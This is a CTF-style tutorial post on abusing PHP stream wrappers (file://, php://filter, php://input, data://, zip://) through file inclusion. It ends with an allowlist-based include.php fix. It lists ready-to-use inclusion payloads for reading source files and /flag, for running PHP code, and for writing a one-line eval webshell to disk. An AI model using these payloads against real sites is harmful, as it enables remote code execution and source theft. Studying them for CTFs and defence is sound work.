PHP pseudo protocol for command execution
2022-07-19 02:37:00 【jjj34】
Reference link: PHP pseudo-protocol summary - SegmentFault 思否
1. file:// protocol
Conditions:
allow_url_fopen: off/on
allow_url_include: off/on
Effect:
Used to access the local file system. In CTFs it is usually used to read local files.
When the argument to include() / require() / include_once() / require_once() is controllable, the included file is still parsed as PHP even if it is not a .php file (for example shell.txt). This is how include() behaves.
Explanation:
file:// (the file system wrapper) is the default wrapper used by PHP and represents the local file system.
Usage:
/path/to/file.ext
relative/path/to/file.ext
fileInCwd.ext
C:/path/to/winfile.ext
C:\path\to\winfile.ext
\\smbserver\share\path\to\winfile.ext
file:///path/to/file.ext
Example:
1. file://[absolute path and file name of the file]
http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt
2. file://[relative path and file name of the file]
http://127.0.0.1/include.php?file=./phpinfo.txt
3. http://[network location and file name]
http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt

2. php:// protocol
Conditions:
allow_url_fopen: off/on
allow_url_include: only php://input, php://stdin, php://memory and php://temp need on
Effect:
php:// gives access to the various input/output streams (I/O streams). The ones commonly used in CTFs are php://filter and php://input:
php://filter is used to read source code
php://input is used to execute PHP code
Explanation:
PHP provides a number of miscellaneous input/output (I/O) streams that allow access to PHP's own I/O streams, the standard I/O streams and the error descriptor.

php://filter usage
php://filter/read=convert.base64-encode/resource=[file name]
php://input usage
http://127.0.0.1/include.php?file=php://input
[POST DATA part]
<?php phpinfo(); ?>
Writing a one-line webshell
http://127.0.0.1/include.php?file=php://input
[POST DATA part]
<?php fputs(fopen('1juhua.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>

3. data:// protocol
Effect:
With PHP >= 5.2.0 the data:// stream wrapper is available and carries data in the given format. It is usually used to execute PHP code.
Usage:
data://text/plain, ???
For example:
http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>

4. zip:// & bzip:// & zlib:// protocol
Effect:
zip://, bzip:// and zlib:// are all compression streams. They can access the files inside a compressed file and, more importantly, they do not need a particular suffix: the archive can be renamed to any suffix, such as jpg, png, gif, xxx, etc.
Example:
1. zip://[absolute path of the compressed file]%23[name of the file inside the compressed file] (# is encoded as %23)
Compress phpinfo.txt into phpinfo.zip, rename the archive to phpinfo.jpg, and upload it
http://127.0.0.1/include.php?file=zip://E:\phpStudy\PHPTutorial\WWW\phpinfo.jpg%23phpinfo.txt
2. compress.bzip2://file.bz2
Compress phpinfo.txt into phpinfo.bz2 and upload it (any suffix is also supported)
http://127.0.0.1/include.php?file=compress.bzip2://E:\phpStudy\PHPTutorial\WWW\phpinfo.bz2
3. compress.zlib://file.gz
Compress phpinfo.txt into phpinfo.gz and upload it (any suffix is supported)
http://127.0.0.1/include.php?file=compress.zlib://E:\phpStudy\PHPTutorial\WWW\phpinfo.gz

Summary
The ones most commonly seen in CTFs are data://, php://input, php://filter and file://
php://input and data:// are used to execute commands
1. php://input usage
http://127.0.0.1/include.php?file=php://input
[POST DATA part]
<?php phpinfo(); ?>
2. data:// usage
http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>
php://filter and file:// are used to read files
3. php://filter usage
http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php (a PHP file has to be encoded before it can be read out)
http://127.0.0.1/include.php?file=php://filter/resource=/flag
4. file:// usage
http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt
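
Every URL above works only because include.php hands the file parameter straight to include(), and the conditions listed for file://, php://filter and the compression wrappers show that turning allow_url_fopen and allow_url_include off does not stop them. The following is an added example, not code from the original post, of an include.php that maps the parameter through an allowlist so that no wrapper string ever reaches include(). The directory layout and the names PAGE_DIR, PAGES and resolve_page are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Assumed layout (not from the post): includable files live only in ./pages.
const PAGE_DIR = __DIR__ . '/pages';

// Allowlist of request value => file name under PAGE_DIR (constructed names).
const PAGES = [
    'home'  => 'home.php',
    'about' => 'about.php',
];

/**
 * Map the ?file= value to a path that is safe to include, or null.
 * The request value is only used as an array key, so it is never parsed
 * as a path or as a wrapper URL (file://, php://, data://, zip://, ...).
 */
function resolve_page($requested): ?string
{
    // Arrays (?file[]=x) and unknown keys are rejected outright.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . PAGES[$requested]);
    // Defence in depth: the target must exist and resolve inside PAGE_DIR.
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Pattern the URLs above depend on:  include $_GET['file'];
// Replacement: only allowlisted keys ever reach include.
$target = resolve_page($_GET['file'] ?? 'home');
if ($target === null) {
    http_response_code(404);
    exit('Not found');
}
include $target;
```

With this in place a request such as include.php?file=php://input or include.php?file=zip://...%23phpinfo.txt returns 404, because the value is not a key in PAGES.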